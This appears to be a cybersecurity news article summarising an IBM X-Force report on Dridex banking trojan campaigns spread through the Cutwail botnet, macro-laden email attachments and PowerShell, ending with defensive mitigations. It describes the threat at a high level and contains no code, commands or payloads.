Dridex Network Attack Campaign Delivered by Cutwail Botnet and Poisonous PowerShell Scripts

The IBM X-Force threat intelligence team has recently reported that they are continuously witnessing a huge increase in Dridex-related network attacks, and all these attacks are executed by the Cutwail botnet. 

According to the cybersecurity analysts, soon after the original document or spreadsheet appears through email with booby-trapped macros, the Dridex is manifesting itself as a second-stage infector. 

Apart from this, the IBM X-Force is perceiving nearly limited campaigns that are quite active in Italy and Japan.

Summon PowerShell to Download Dridex

All the recipients have received undesirable messages that are embracing the Microsoft Office file attachments due to the malspam email, as all the initial infected vectors of the attacks were discerned in the malspam email.

Cutwail is quite pre-eminent and one of the leading spamming infrastructures in the cybercrime arena, that’s why all these file attachments are often delivered through the Cutwail botnet.

It is being named as the most comprehensive of its kind in 2009, and it is still proceeding to expand spam for elite malware-wielding groups in 2021.

Since June 2020 the IBM X-Force threat intelligence team has remarked that nearly, 34% of all PowerShell-based raids and all of them were ultimately associated with a Dridex payload.

Dridex: a Banking Trojan or a Ransomware?

The most asked question among the analysts is that Dridex is a banking Trojan or ransomware? The security researchers at the X-Force have cleared this question by concluding that Dridex is a banking Trojan.

In various cases, the operators of Dridex are known as the ‘Evil Corp’ group, and it may leverage all its capability to steal every possible credential of the current victims along with web injections.

Not only this, even there are many cases recognized where Dridex is operated as a bot-herding tool that is a compelling information stealer.

Targeted sector and what is next for Dridex?

The most targeted sector that is being listed in the managed security services networks is health care, as X-Force recognized that health care is one of the top targets of the overall progress in PowerShell attacks.

Not only this but health care is being followed by the financial sector and by retailers too, health care is targeted most because of the recent pandemic situation.

Moreover, the Dridex often does its business with other various cybercrime groups also that have their roots in the elite criminal arena in eastern Europe according to the analysts. 

But now the question arises here that what is next for Dridex?

In early January 2021, it seems that Dridex is examining a couple of avenues, and researchers have also noticed that it is spreading through the Rig Exploit Kit, the Cutwail botnet, and, in some cases, by the QakBot botnet.

Mitigations

There are some mitigations that are suggested by the threat intelligence team, and here we have mentioned them below:-

• All the employees should have perfect knowledge regarding the latest phishing methods so that it can assist them in recognizing questionable emails with malicious attachments.
• Every security team should exercise appropriate Yara rules as it will surely assist them in detecting the use of malicious PowerShell.
• Every organization must tune its SIEM system with improved malicious PowerShell detection skills.
• The organization should contemplate a managed detection and reply to every solution to easily secure their endpoints.

You can follow us on Linkedin, Twitter, Facebook for daily Cybersecurity and hacking news updates.

Also Read

NimzaLoader Malware Developed Using a Rare Programming Language to Avoid Detection

Researchers Uncovered a New Office Malware Builder Dubbed APOMacroSploit